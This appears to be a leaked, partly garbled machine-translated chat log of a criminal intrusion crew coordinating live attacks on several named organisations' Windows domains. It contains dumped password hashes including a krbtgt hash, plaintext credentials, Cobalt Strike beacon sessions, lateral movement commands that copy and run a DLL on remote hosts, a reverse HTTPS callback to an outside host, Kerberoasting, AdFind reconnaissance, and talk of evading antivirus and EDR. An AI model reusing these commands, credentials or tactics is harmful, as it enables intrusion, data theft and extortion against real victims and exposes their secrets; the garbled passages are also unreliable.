5142 training 
d2633be354cbf2c6c9327bea488a1698 66048 7546 kimberly.palma fa7a1717c1477d70b45152cc92db284c 512 2126 tony.aguayo d2633be354cbf2c6c9327bea488a1698 512 6151 ACCT410-PC$ 0cad6bf0673b2387a3c9babe1773d173 4096 12133 LEGALTICKETS$ cd1f405d4ca566aced322f382d3344ae 4096 3336 LV_SANDRAM$ 7acfe13f3d7bb767f4bacc834fed00c4 4096 7506 Adrienne.Moran 971eff2411f9cf98bf5f8d31351176d6 66048 3166 ACCT325-PC$ 2f52c971070b641950418e804b04e8e0 4096 6129 SACCT104-PC$ fc5471fd649502695d6ce2df138678b0 4096 7110 ACCT408-PC$ 5f5683625982eae081fa5171f58c1211 4096 1716 ACCTB176-PC$ e449cf83d093b7abd61619f24d0b9cd1 4096 3164 JIMILAPTOP-PC$ 0c141c9d492b72835c688b145ea7834e 4096 6195 ACCT352-PC$ 6afd84560fafc6a08fab7b2c257ebf6b 4096 6111 ACCT368-PC$ 069c57aa53dd5fd6e6ff29ee80efe9cd 4096 3636 SACCT127-PC$ a57cdd795f1c18e67067fb30e11aae48 4096 3210 SACCT103-PC$ d7739490032cbbf2ca03212ae0de32c2 4096 1245 sandra.movius bb08e25d1bd4ea07b24e89b757a1fa01 66048 13107 CASEYCOVELLO$ 4dd8a8e964d8a90fe6200931ba1581 4096 3338 DESKTOP-FMESA9L$ 84e13173788accaf8e22cc0fd88f4a0c 4096 2428 SABRINABUKSH$ 2ff1c899af5f799a45ed48724888d5be 4096 1735 ACCT210-PC$ 16c51d5eca5062ea78a66eb47fc1774b 4096 2749 rodolfo.estrada d2633be354cbf2c6c9327bea488a1698 512 11114 JIMILTP-2020$ a0f4fc216db761d18b8910656789749a 4096 1151 denise.williams 7c0b1ce7bec19ac52eada89ec4d15668 66048 7525 pamela.hernandez fa7a1717c1477d70b45152cc92db284c 512 7327 Vincent.Velardi d2633be354cbf2c6c9327bea488a1698 66048 500 Administrator 190d7c1850cd42a7197a6bd805f50bc9 66048
```
Or lock today) in the domain, get + thank you
user7
@user7 who else to add?
So they flew off on their own)
We haven't worked with them for the last 30 minutes, why did you kill all the sessions?
Still disconnected from the domain, and there are no machines in the environment
```
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2bd07805e537f32fe65cdb7ec1ac64c6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
```
```
* Username : bstangea
* Domain   : RTPCO
* NTLM     : f13d2f88fdf2a0970db1ece9ce90bc57
Local Group Memberships
  *iDRAC-Admins
  *Netmon Users
  *StorageAdmin
  *VMWare-Admins
  *VMWare-Admins-Alloy
  *VSA_Users
Global Group memberships
  *VSA_Admins
  *Test_Alloy
  *IT
  *SQL Server Admins
  *testgroup1
  *RTP-Admins_Ent
  *TestShare
  *RTP-IT-Admins
  *Domain Users
  *O365_Sync
```
I just got the second one
13 minutes ago 1 flew in. Is there a second one? If it doesn't come in, it means the cob is blocked, and 20 minutes ago Kaspersky couldn't see it.
```
====== AntiVirus ======
Engine       : Windows Defender
ProductEXE   : windowsdefender://
ReportingEXE : %ProgramFiles%\Windows Defender\MsMpeng.exe

Engine       : Kaspersky Endpoint Security 10 for Windows
ProductEXE   : C:\Program Files (x86)\Kaspersky Lab\Kaspersky Endpoint Security 10 for Windows SP2\wmiav.exe
ReportingEXE : C:\Program Files (x86)\Kaspersky Lab\Kaspersky Endpoint Security 10 for Windows SP2\x64\wmi64.exe
```
I thought it wasn't mentioned out loud, and WinDef, well, it's clear where avp comes from. Just in case, is it related to Kaspersky by any chance? I noticed it later, well, Kaspersky
[ ](https://mediaeveryone.com/group/1-done-rtpcompany-com?msg=SHJHSBqfenpxjBRxe)
what's this about?
```
3356   576   LockApp.exe                 x64  1  RTPCO\amcnally
4120   892   avp.exe
5244   4120  avp.exe                     x86  1  RTPCO\amcnally
4848   892   securityHealthService.exe
11600  4340  MSASCuiL.exe                x64  1  RTPCO\amcnally
```
only the Kaspersky process isn't red, there's Symantec, and Kaspersky is still the same
```
[+] Determining what EDR products are installed on localhost...
[+] host called home, sent: 57 bytes
[+] SISIPSFileFilter.sys Found
[+] 1 EDR Products Found!
======================
| Vendor Information |
----------------------
[+] Symantec Found!
```
```
4292 892 KaseyaEndpoint.exe
```
so when you were all sitting on one PC together and tried to get into the trust, it was unsuccessful
they clean up anchors, sessions, in general everything they can clean up)
[ ](https://mediaeveryone.com/group/saiglobal-com?msg=s4LNHXhgaMfybMpmb)
another thing: so even if they brought a cob from outside, pass it on yourselves, what's the point of it?
@user8 reread the message above
or stay in the same one and from that cob go on to the trusts in lycznyetuda
fuck the server, there is a cob from which we have not worked with this domain yet, I told you about it, and it was a good thing to try
it was necessary to ping from the server where you want a session, 1 cob that can get a session
so the question was: you do not have a session on the inbound router and you do not get any sessions from anywhere, and now you sit on the same server and traffic flies to your domains and other things; at this point their IT guys sat there and watched the traffic
if you all crowded on one server and each had a session, analyze the traffic and cut off segments
admins do what?
when you raised a fuss in the network the last time, we did it for a week, we were scattered across the trusts
+
[ ](https://mediaeveryone.com/group/saiglobal-com?msg=8gSx7ucdX2qwNQcZS)
everyone had active sessions on the cob? and from there to personal spam from the same test .66
so if we were all there from personal cobs anyway, maybe it makes sense to try from a cob that we have not touched yet?
how was it copied and to which servers did it have time to run?
so maybe it's not the dll that gets burned but the cob?)
give me a bin, I will make another crypt
the hash changes from rebuild and re-create, AV chopped the re-crypted dlls, will something change from re-creating?
user1 got a session, from AD got a server, pinged it, pinged the servers that respond to ping, spread our dlls and run, right?
domain, where to pass?
I'm also the last one, and fucked up here already
in the finale I'll give you another session if there is a back, pass it to user1 - he will spread us across the servers
yes, fucked up....
how did you try?
right, while trying to spread it flew away
so as I understand no one is outside the current machine, are there more backs?
our sessions flew off... so far only the dog is getting fucked up :thinking:
if you're pinging the name and get 100% loss, then there is a chance that the server has simply turned off replies to ping, or the FW interferes, or other reasons
what else not to do? if there is no use - access denied, user or password wrong - don't touch it immediately
you're asking about 445, so there is an option, or are you confusing me already?
[ ](https://mediaeveryone.com/group/saiglobal-com?msg=XmYaJLHszyi2pttqa)
if you read the errors, you won't get locked
[ ](https://mediaeveryone.com/group/saiglobal-com?msg=Z5zKpqTJrL9hpr8S5)
if you get a DNS response that it does not see the name, how do you even want to interact? net use with the credentials?
I can't ping 10.225.10.200, it's datacenter.local, how do I even communicate with it? Just to be clear.
```
beacon> portscan 10.225.10.200 445 icmp 1024
[*] Tasked beacon to scan ports 445 on 10.225.10.200
[+] host called home, sent: 93245 bytes
[+] received output:
Scanner module is complete
```
?
and 445 is open?
if the domain is not pinged, is it possible to pull something from it?
in all the others we have it?
update the file above, visible via the trust; if it's visible by itself, it's already possible, but it is pinged and possible
so if c360 is in quarantine, is there any sense in going to it? don't kill this one, keep it live?
```
make_token saig.frd.global\svc_actifio B0b@f3tt
```
saig.frd.global\ what domain is it? is it not active (can we make tickets from one domain to another? you should check when it has a pass) and is it enabled?
```
502 krbtgt 21dbd0c360e58ac61e4ae83052f1c582 514
```
what can we do about it?
Remind me please)
other domains will be here soon, and they started in order
dxink was taken on Tuesday, took a user who has not changed the password since last month in the start domain (just checked), and in c360 apparently changed the password)))
they will not just sit and wait)
[ ](https://mediaeveryone.com/group/saiglobal-com?msg=ZDZp8BjrNibbDXpfF)
logically, since the admins knew about us in full flight, we changed passwords from DA
deleted the ad_user above, plus it won't lock: through shell dir \\faque.rex\C$ if you check the validity of the user, it will not lock; in case of what?
fuck, the user did not finish downloading in legalco, and in c360 also can't get in, not only him
well, they obviously sensed it and closed the data center from here
@user8 got in from yesterday in the domain?
```
beacon> shell nslookup 10.225.10.200
[*] Tasked beacon to run: nslookup 10.225.10.200
[+] host called home, sent: 53 bytes
[+] received output:
*** Request to UnKnown timed-out
DNS request timed out.
    timeout was 2 seconds.
Server:  UnKnown
Address:  10.225.12.200

DNS request timed out.
    timeout was 2 seconds.
```
The old one should not be overwritten. It would be a good idea to update the AD info on the current domains, check dcsync
pinged, as well as c360, and almost everything is in quarantine, 13 instead of 19)
```
dn:CN=datacenter.local,CN=System,DC=saig,DC=frd,DC=global
>whenCreated: 2018/06/08-09:59:39 Eastern Daylight Time
>name: datacenter.local
>securityIdentifier: S-1-5-21-3425310730-2254951293-3528185534
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: datacenter.local
>trustType: 2 [UpLevel(2)]
>trustAttributes: 4 [Quarantined-Domain(4)]

dn:CN=datacenter.local,CN=System,DC=frd,DC=global
>whenCreated: 2018/04/13-09:59:37 Eastern Daylight Time
>name: datacenter.local
>securityIdentifier: S-1-5-21-3425310730-2254951293-3528185534
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: datacenter.local
>trustType: 2 [UpLevel(2)]
>trustAttributes: 8 [Transitive(8)]
```
Why?
Yesterday @user8 was working with it
how long ago, were there sessions in the DC?
@tl1 Well what is it? Maybe just datacenter? There are no others, in fact it turns out to be the same places from where you hit last time?
```
beacon> shell ping datacenter.local
[*] Tasked beacon to run: ping datacenter.local
[+] host called home, sent: 52 bytes
[+] received output:
Ping request could not find host datacenter.local. Please check the name and try again.

beacon> shell ping 10.225.10.200
[*] Tasked beacon to run: ping 10.225.10.200
[+] host called home, sent: 49 bytes
[+] received output:
Pinging 10.225.10.200 with 32 bytes of data:
Request timed out.
Request timed out.
[+] received output:
Request timed out.
[+] received output:
Request timed out.

Ping statistics for 10.225.10.200:
    Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
```
AUSYDHC-ESP-DC1.legalco.holasal
guys, if it pings, it can be worked with via bind_pipe or other tools
I remember that some domain is completely closed from outside in terms of sessions
looking for the FireEye admin... if you can't find it, there is an alternative solution, but not a very good one... Theoretically our .exe can even go under it, but it's a lottery and the chances are not in our favor.
@user3 from the other domains the guys are now sitting in - also passed?
legalco.local servers and the domain are not pinged if you fuck with it directly)))))
well, and a dll is technically mmm a binary too)
so disable it like Sophos?
final binaries) dll of the binaries?
it will kill our binary processes and drop them from the network; before, it worked quietly and it's not much of a hindrance. the main problem I see is the FireEye agents I mentioned above
looking for techs, AVs, backups. everything is standard, we just need to "finish" properly what we have here, by tasks?
ok, and then portscan with the dll in winlogon, then within my borders, in the process, do it with the dll; datacenter, here I'll take global, with the dll I'll make datacenter myself and from there portscan, fuck, ok?
tolerable
it's not worth multiplying connects and moving around...
how gentle is portscan?
@user1 we're trying to be gentle, see how the cobs fly off...
ok, now we'll work with user3 in user7's cob, pinging from user3's cob is 100% loss
before you pass it on to others - ping out gently, icmp probably won't be an alert
if the https connect is burned, the only way to get out is by pinging, right then and there
you also blocked me from user3's cob the other day; it's not even trying to get your cob into that network anymore
you and pacific, probably; you're not a big deal. work with someone else's cob, you can't get into my cob
.204 from the saig.frd.global session pinged myself (firedi.com) and got 100% loss
very carefully in datacenter, no abrupt moves, and move "within" the domain, only from the entry point and gently, ok
jump through others who don't see the domain, all of them so far; I'm not even talking about beacons - that goes without saying, we don't know yet where datacenter runs....
is datacenter.local the highest priority
+
@user1 @user3 confirm please
+947ya+94ya+9ya
+
everyone understands what exactly needs to be prepared and found out?
```
[*] Tasked beacon to spawn (x86) windows/foreign/reverse_https (regbest.com:443)
```
minutes to regbest.com:443, from there we'll take it apart
++
can you pass it on to the right trusts yourself?
here in this domain I have a back, checking the back, if it's off - today we'll take on other things
Will the others?
I have datacenter down for 34 hours, saiglobal for 20; no one in the whole forest has a session left, right?
passloft.com
+
stormname.com:443 pass me
[ ](https://mediaeveryone.com/group/saiglobal-com?msg=4feA2KDB6sntzrit2)
+
firedi.com:443 it's from a subdivision
Mail espreon.com
passloft session at slypad.com:443
@user3 your subjective opinion: is it some kind of separate company or just a legal "department"? what are the ad_users mail there?
legalco.local for adusers 1181 i need all the data we have on domain administrators and network engineers browsers/notes/documentation/kipasses/graphics - anything you think is at least relatively relevant and less than 4 years old@user7 similarly for users and cars@user9 look for virtualization servers, identify key techies in your domain (sysadmins, etc.) and look for their machines.[ ](https://mediaeveryone.com/group/saiglobal-com?msg=PzM6WCqTSMCZj5zC5) c360.local 1. windef(couldn't find more entries, but need to check) 2. categorized 4. No all servers are spinning on wm, including both dksaiglobal tozhen standatd 6k users, the rest (which I worked on) much less at my datacenter dead@user8 scan more ranges of your domain at 80/443/445 for machines that are not part of the domain (NAS probably here - they are outside the domain too) the key domain - datacenter where we close the server segment is fireeye which today we need to solve a SERIOUS problem who works with large major domains with a large number of users - write me fine, deal with it thenall you said in the plan i'll scan everything, it's just that from my coba i couldn't get into the hr...za... the other day in general, the session to get, from there could not ping myself, worked from koba @user3 , now go there, long loading its destination) name of the domain datacenter as if hinted at) yes, already looked it uhm "egress routes" such if you can call it that)[ ](https://mediaeveryone.com/group/saiglobal-com?msg=t7hMZEWZmvZG3dnpy) more, there are everywhere server windup simple you need to see if "other" servers are visible from where the losses from these two-servers of the same group usually see each other, even if part of the group is closed to the rest of the segmentUSHDC1-CSPWEB18.datacenter.local USHDC1-CSPWEB22.datacenter.localBut there is a server with this prefix, which is in the visibility areaUSHDC1-CSPWEBYou do not see in the routes mostly servers with the prefix now look. 
magic if so - see what's on the file system and what data are on the drives + list of processes of servers in this group to form a correct impressionI guess you just switched the concept of NAS as a file storage? occasionally Very occasionally. but it would be a neutered sevens or something like that in terms of identificationPresumably nas: A ridiculous assumption, no offense. us - aka NAS - Network Attached - Storage. NEVER identified as windows server 2012 I take it we are everywhere windup ? the hardware may not let icmp packets through but it does let various administration systems through100% Loss: - most likely behind the hardware, scan them to 80/443/3389/5900will see - I'll tell you what the tascii full domain compositiondatacenter.local is one of the key domains with critical data. Download the categorization of datacenter.local 1. FireEye, Windows Defender 2. The categorization is 3. no we just need to collect this information, we need to find it in the logs/reports Please write back on your domains we are working with 1 - Is anti-virus/edr identified in all the domains? 2 - Did you categorize server systems by purpose in all domains? 3 - Did you find the main segment where sysadmins and network-engineers are sitting? Let's do a quick walkthrough here we need to decide if we're ready for the final phase of the problem with the network again the emphasis on the winlogon last output from winlogon not in the other to the swhost, in winlogon passed on one machine shot in swhostehere local users gives hashdump and in the mime hash computer and not a single userа it does not migrate thereа you shoot from winlogon? 
somewhere so gives out `` `` beacon> hashdump [*] Tasked beacon to dump hashes [+] host called home, sent: 82501 bytes [+] received password hashes: [-] no results ``` ``` beacon> logonpasswords [*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command [+] host called home, sent: 438866 bytes [+] received output: ERROR kuhl_m_sekurlsa_acquireLSA ; Key import ``Priority on the host win-server by other hochuchek la current on tachkada unlikely it is castrated, most likely AB does not givehashdumps with mimic does not givev system processes not injctctitated some lA goes out got where tried above that i dumped was oldmag, already out newer i built the concatenation you dumped today i will build clean dllskin x64dll dirty no, as a matter of fact, there is no problem, i do not have any problem with it, i don`t have any problems with it`` ``. beacon> shell copy x64.dll \139.62.166.164\C$\ProgramData [*] Tasked beacon to run: copy x64.dll \\139.62.166.164\C$\ProgramData [+] host called home, sent: 75 bytes [+] received output: 1 file(s) copied. beacon> shell wmic /NODE:139.62.166.164 process call create "rundll32 C:\ProgramData\x64.dll entryPoint" [*] Tasked beacon to run: wmic /NODE:139.62.166.164 process call create "rundll32 C:\ProgramData\x64.dll entryPoint" [+] host called home, sent: 121 bytes [+] received output: Executing (Win32_Process)->Create() Method execution successful. 
Out Parameters: instance of __PARAMETERS { ProcessId = 8008; ReturnValue = 0; }; beacon> shell dir \139.62.166.164\C$\ProgramData\x64.dll [*] Tasked beacon to run: dir \139.62.166.164\C$\ProgramData\x64.dll [+] host called home, sent: 74 bytes [+] received output: Volume in drive \139.62.166.164.\C$ is Windows Volume Serial Number is FC53-858D Directory of \139.62.166.164.164\C$\ProgramData File Not Found ``Well, get into other hosts where you're admin>> I can tell you that we sat idle for a month, and I remember it only about Remote Admin= )tell me that the first time I heard that):man_facepalming::thinking:your polzak there local admins can check there rps requests if your polzak see shara admin$$ in the course, yes?and why go there?) and there is nothing interesting all the same I on a few machines in the admin's balloon came `` `` Shares for COB-65749: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$ `````` Shares for COB-65749: [--- Unreadable Shares ---] IPC$ [--- Listable Shares XDSPVSSERV05 what's your current drive? I'm browsing through SharpShares now, nothing particularly interesting I've found so far, what have you done in general or in the last +- hour? 
beacon> psinject 15344 x64 Invoke-Kerberoast -domain itstest.ad | fl [*] Tasked beacon to psinject: Invoke-Kerberoast -domain itstest.ad | fl into 15344 (x64) [+] host called home, sent: 133723 bytes [+] received output: TicketByteHexStream : Hash : $krb5tgs$AgpmServer/itstestagpm1.itstest.ad/itstest.ad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amAccountName : agpm-sa DistinguishedName : CN=AGPM SA,OU=Users,OU=ITSTEST,DC=itstest,DC=ad ServicePrincipalName : AgpmServer/itstestagpm1.itstest.ad/itstest.ad WARNING: [Get-DomainSPNTicket] Error requesting ticket for SPN 'FIMService/ITSTESTFIM.itstest.ad' from user 'CN=FIMService,OU=Service Accounts,DC=itstest,DC=ad' : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were unable to create a Kerberos credential, see inner exception for details". TicketByteHexStream : Hash : $krb5tgs$AgpmServer/itstestagpm1.itstest.ad/itstest.ad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amAccountName : FIMService DistinguishedName : CN=FIMService,OU=Service Accounts,DC=itstest,DC=ad ServicePrincipalName : AgpmServer/itstestagpm1.itstest.ad/itstest.ad WARNING: [Get-DomainSPNTicket] Error requesting ticket for SPN 'host/certauth.testfs.auth.unf.edu' from user 'CN=ADFS2ServiceAcct,OU=Service Accounts,DC=itstest,DC=ad' : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were unable to create a Kerberos credential, see inner exception for details." 
TicketByteHexStream : Hash : $krb5tgs$AgpmServer/itstestagpm1.itstest.ad/itstest.ad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amAccountName : ADFS2ServiceAcct DistinguishedName : CN=ADFS2ServiceAcct,OU=Service Accounts,DC=itstest,DC=ad ServicePrincipalName : AgpmServer/itstestagpm1.itstest.ad/itstest.ad WARNING: [Get-DomainSPNTicket] Error requesting ticket for SPN 'http/ITSTESTFIM' from user 'CN=FIMAppPoolAcct,OU=Service Accounts,DC=itstest,DC=ad' : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were unable to create a Kerberos credential, see inner exception for details." TicketByteHexStream : Hash : $krb5tgs$AgpmServer/itstestagpm1.itstest.ad/itstest.ad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amAccountName : FIMAppPoolAcct DistinguishedName : CN=FIMAppPoolAcct,OU=Service Accounts,DC=itstest,DC=ad ServicePrincipalName : AgpmServer/itstestagpm1.itstest.ad/itstest.ad TicketByteHexStream : Hash : $krb5tgs$MSSQLSvc/itstestsql.itstest.ad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amAccountName : Administrator DistinguishedName : CN=Administrator,OU=SysAdmins,OU=UNFUsers,DC=itstest,DC=ad ServicePrincipalName : MSSQLSvc/itstestsql.itstest.ad:1433 ``rubuus only kerberost in the trust under number 0 he trusts himself)`` beacon> net domain [*] Tasked beacon to run net domain [+] host called home, sent: 257 bytes [+] received output: unfcsd.unf.edu ``What is he doing in the trusts?[ ](https://mediaeveryone.com/group/unf-edu?msg=wYaqe7ar8HXNYkafK) under number 3 the current domain is tripped he only took from it as I see it from the toolchain did he poll the kerbs from all? while he is poking around in other domains? 
did not poll them with adfind ?xp one dead2003 not five, alive only thiswin 2008 ``` beacon> shell ping PHONEBILLING.unfcsd.unf.edu [*] Tasked beacon to run: ping PHONEBILLING.unfcsd.unf.edu [+] host called home, sent: 63 bytes [+] received output: Pinging PHONEBILLING.unfcsd.unf.edu [139.62.201.87] with 32 bytes of data: Reply from 139.62.201.87: bytes=32 time<1ms TTL=128 Reply from 139.62.201.87: bytes=32 time<1ms TTL=128 Reply from 139.62.201.87: bytes=32 time<1ms TTL=128 Reply from 139.62.201.87: bytes=32 time<1ms TTL=128 Ping statistics for 139.62.201.87: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms ``Thank you+have+extracted``. /home/user/Desktop/cobalt/Signature_Tools/toolchain/modules/HPE/Rubeus/Rubeus.exe ``` are you sure you have the right file here? uhhhh here's the Toulchain Invokerberost[ ](https://mediaeveryone.com/group/unf-edu?msg=pQ3pis2485fxQ3AcY) well here's the Toulchain file with your hands `` [*] cd C:\ProgramData\ [+] host called home, sent: 23 bytes [-] File /home/user/Desktop/cobalt/Signature_Tools/toolchain/modules/HPE/Rubeus/Rubeus.exe is not a process assembly (.NET EXE) Please give me the full log with the manual start and the toolchain startup. ``` [*] cd C:\ProgramData\ [+] host called home, sent: 23 bytes [-] File /home/user/Desktop/cobalt/Signature_Tools/toolchain/modules/HPE/Rubeus/Rubeus.exe is not a process assembly (.NET EXE) ``@user8 did you know you can kerberoast trust domains? 
beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/Rubeus.exe kerberoast /ldapfilter:'admincount=1' /format:hashcat /outfile:C:\ProgramData\hashes.txt [*] Tasked beacon to run .NET program: Rubeus.exe kerberoast /ldapfilter:'admincount=1' /format:hashcat /outfile:C:\ProgramData\hashes.txt [+] host called home, sent: 318171 bytes [+] received output: ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v1.5.0 [*] Action: Kerberoasting [*] NOTICE: AES hashes will be returned for AES-enabled accounts. [*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts. [*] Searching the current domain for Kerberoastable users [X] No users found to Kerberoast! [*] Roasted hashes written to : C:\ProgramData\hashes.txt ``` ``` beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/Rubeus.exe asreproast /format:hashcat /outfile:C:\ProgramData\asrephashes.txt [*] Tasked beacon to run .NET program: Rubeus.exe asreproast /format:hashcat /outfile:C:\ProgramData\asrephashes.txt [+] host called home, sent: 318127 bytes [+] received output: ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v1.5.0 [*] Action: AS-REP roasting [*] Target Domain : unfcsd.unf.edu [*] Searching path 'LDAP://doc2.unfcsd.unf.edu/DC=unfcsd,DC=unf,DC=edu' for AS-REP roastable users [X] No users found to AS-REP roast! 
[*] Roasted hashes written to : C:\ProgramData\asrephashes.txt ``GPPP: ``` [RESULT] Username: student [RESULT] Changed: 2013-11-19 17:00:59 [RESULT] Password: 1510 ``` ``` [RESULT] Username: Presenter [RESULT] Changed: 2011-06-27 18:57:56 [RESULT] Password: presenter ``` ``` [RESULT] Username: Podium [RESULT] Changed: 2015-08-21 18:42:19 ``` ``` [RESULT] Username: student [RESULT] Changed: 2017-04-07 13:46:59 [RESULT] Username: cislocal [RESULT] Changed: 2017-04-07 13:47:25 If you don't see cmd then you can't see the output of 7za it works within the parent process cmd7za console app I wonder if on the target machine 7za.exe works in the background or a window appears? otherwise take it and delete it as usual or take the harddack from them if you want to do a silent delete with overwriting) and is it silent?when i clean it, will it ever get deleted? i mean, will it ever get deleted? will it ever get deleted? archive it and take it away)) 505 megabytes of it, it's probably just a fat hell or netschek pshell adFind.bat adfind.exe -f "(objectcategory=person)" > ad_users.txt adfind.exe -f "objectcategory=computer" > ad_computers.txt adfind.exe -f "(objectcategory=organizationalUnit)" > ad_ous.txt adfind.exe -subnets -f (objectCategory=subnet)> subnets.txt adfind.exe -f "(objectcategory=group)" > ad_group.txt adfind.exe -gcb -sc trustdmp > trustdmp.txt ``adfind through the batek startup already, I was looking to finish the sitinfo or not through the type where the shell, execute, etc.dd handy to remove, it came out: ``` C:\ProgramData>adfind.exe -f "(objectcategory=person)" 1>ad_users.txt AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015 ``` and so far is silent ad_users.txt - 0 bytes ``. 
beacon> net domain_trusts [*] Tasked beacon to run net domain_trusts [+] host called home, sent: 104513 bytes [+] received output: List of domain trusts: 0: ITSTEST itstest.ad 1: UNFMAN unf.man 2: ADROOT unf.edu (Forest tree root) (Direct Outbound) (Direct Inbound) 3: UNFCSD unfcsd.unf.edu (Forest 2) (Primary Domain) (Native) ``also please net domain_trusts``. beacon> net domain_controllers [*] Tasked beacon to run net domain_controllers [+] host called home, sent: 104518 bytes [+] received output: Domain Controllers: Server Name IP Address ----------- ---------- DOC1 139.62.200.188 DOC2 139.62.200.189 DOC4 139.62.200.191 DOC3 139.62.200.190 AZPDDC01 10.249.1.8 AZPDDC02 10.249.1.9 beacon> net domain [*] Tasked beacon to run net domain [+] host called home, sent: 257 bytes [+] received output: unfcsd.unf.edu ``DA: ``` Group name Domain Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- Administrator donh donovanf johns krist mikeh ServiceAdmin The command completed successfully. ``` LA: ``` Alias name administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator CtxAppVCOMAdmin UNFCSD\Domain Admins UNFCSD\Nervief UNFCSD\Server Admins The command completed successfully. ``` EA: ``` The request will be processed at a domain controller for domain unfcsd.unf.edu. The group name could not be found. More help is available by typing NET HELPMSG 2220. ``in private, of course)is it for me? :point_right::point_left:is)what do you say there is a clean coba?) at 21550 stalled and has been standing for about 10 minutespererozhdaya at 21956 stopped :/you have output for a few meters long loading in the coba restart still? 
column last not updated now cobalt itself suspend 3 and kill one in the first is crashed in bacon adfind the second doesn't give the output work the second + so you have 2 sessions? exit will help, no? i have to kill all jobs at once i can't see the list of jobs even[ ](https://mediaeveryone.com/group/unf-edu?msg=WRkZc2uEaZ4wdmyvw) well this one kills one by one ls while not that pwd in the second session output appeared all jobs at once kill or `jobs -K`?does not work like in the msf `jobkill -K `but the session did come[ ](https://mediaeveryone.com/group/unf-edu?msg=eZuMneNTDBvSMrxDH) here's the second session, will it lag? closed the kmd and it disappeared at one point appeared near the file LockFile still? i called kmd through a shortcut i think just lag hell because the adfind pours in biconna mbd somewhere on fv cut off your domain spalili and started me to shove their adfind? xd when the bicon receives commands and does not give anything and lags horribly most likely spalili even in bicon does not go silent her lsona silent her pwd she does not output anything made another session i did a copy through the pkmya no jobs output in the session can not, nothing because i have to use pkma it actually looks like this on the screenshot i made ktrl+a and copyinbicon it prints adfindcockxxxxx` `` powershell -nop -w hidden -encodedcommand 
``bicon log output please attach with this problemWhy does it do this is not very clearThe output is normal in bicon shortly output hell was downloaded - 150 bytes archive and 0 bytes folder inside only wrote off and livelyanu magic ran addition from the toolchain and the session hung for 2 minutes already `` `` https://login.veeam.com/,https://login.veeam.com/auth/realms/veeamsso/protocol/openid-connect/auth,21/12/2020 15:27:42,13253038062778136,londonit@ballymoregroup.com,I ?$??c$C? ``c$c$non-printers didn't exist at all``.
192.0.2.117:445 (platform: 500 version: 4.9 name: PREMIERNEW domain: WORKGROUP) 192.0.2.214:445 (platform: 500 version: 6.1 name: TV-BALLY-S4P10 domain: WORKGROUP) 192.168.3.206:445 (platform: 500 version: 2.0 name: KM89B642 domain: KM-NetPrinters) 192.168.3.202:445 (platform: 500 version: 2.0 name: KM8FD05B domain: KM-NetPrinters) 192.168.3.204:445 (platform: 500 version: 2.0 name: KM892613 domain: KM-NetPrinters) ``https://login.veeam.com/tarnold Canary5500`` 192.0.2.3:443 192.0.2.3:80 - us Username : admin Password : -6&J{*n]e73e]Mm 192.0.2.1:443 192.0.2.1:80 - VMWare ESXi tried the nasa crescendos First - Connection to ESXi host timed out Then - Cannot complete login due to an incorrect user name or password. 192.0.2.213:443 192.0.2.213:80 192.0.2.213:22 (SSH-2.0-OpenSSH_7.9) - ASRockRack IPMI web gui system monitoring Username : admin Password : admin 192.0.2.248:443 192.0.2.248:80 192.0.2.248:22 (SSH-2.0-mpSSH_0.2.1) - iLO 4 ProLiant HP, tab "iLO: Bally44Backup-iLO.ballymoregroup.local" However, the Ping request could not find host Bally44Backup-iLO.ballymoregroup.local. Please check the name and try again. 192.168.3.162:443 192.168.3.162:22 (SSH-2.0-mpSSH_0.2.1) - iLO 5 ProLiant host is ILOCZ292107HT.ballymoregroup.local Ping request could not find host ILOCZ292107HT.ballymoregroup.local. Please check the name and try again. 192.168.15.158:80 - IIS Windows Server 192.0.2.99:80 - IIS Windows Server 192.0.2.246:80 - IIS7 192.168.3.202:443 - kyocera printer scanner 192.168.3.207:443 - HP DesignJet T1600 Printer 192.0.2.243:8080 192.0.2.243:443 192.0.2.243:80 - HP DesignJet T2530 PostScript printer 192.168.3.201:443 - printer hp LaserJet 4200 192.0.2.214:443 192.0.2.214:80 - tab "TV-BALLY-S4P10 - Control Page", link "https://7bj6wypy6p.dattolocal.net/login", Portal based login is enabled for this device. In order to access this device, you must have a Datto Partner Portal account. The Portal-Login button redirects to "https://auth.datto.com/login". 
Checked YES with domain @, it didn't go through. 192.0.2.27:80 - Schneider Electric is a European multinational company providing energy and automation digital solutions for efficiency and sustainability. It addresses homes, buildings, data centers, infrastructure and industries, by combining energy technologies, real-time automation, software and services. No Credits 192.168.3.161:443 - asks for username and password on the fly 10.0.180.254:8080 10.0.180.254:443 - WatchGuard https://10.0.180.254/sslvpn_logon.shtml 192.168.3.21:443 - VIA Collaboration Hub With any laptop or mobile device, VIA wireless presentation and collaboration solutions let meeting participants share any size file, edit documents together in real time, turn the main display into a digital whiteboard, chat with other users, and stream full uninterrupted HD video (up to 1080p60). Two buttons, Run and Install, both suggest downloading the software 192.0.2.117:22 (SSH-2.0-OpenSSH_5.3) 192.0.2.105:22 (SSH-2.0-dropbear) 192.0.2.71:22 (SSH-2.0-dropbear) 192.0.2.59:22 (SSH-2.0-dropbear) 192.0.2.50:22 (SSH-2.0-dropbear) 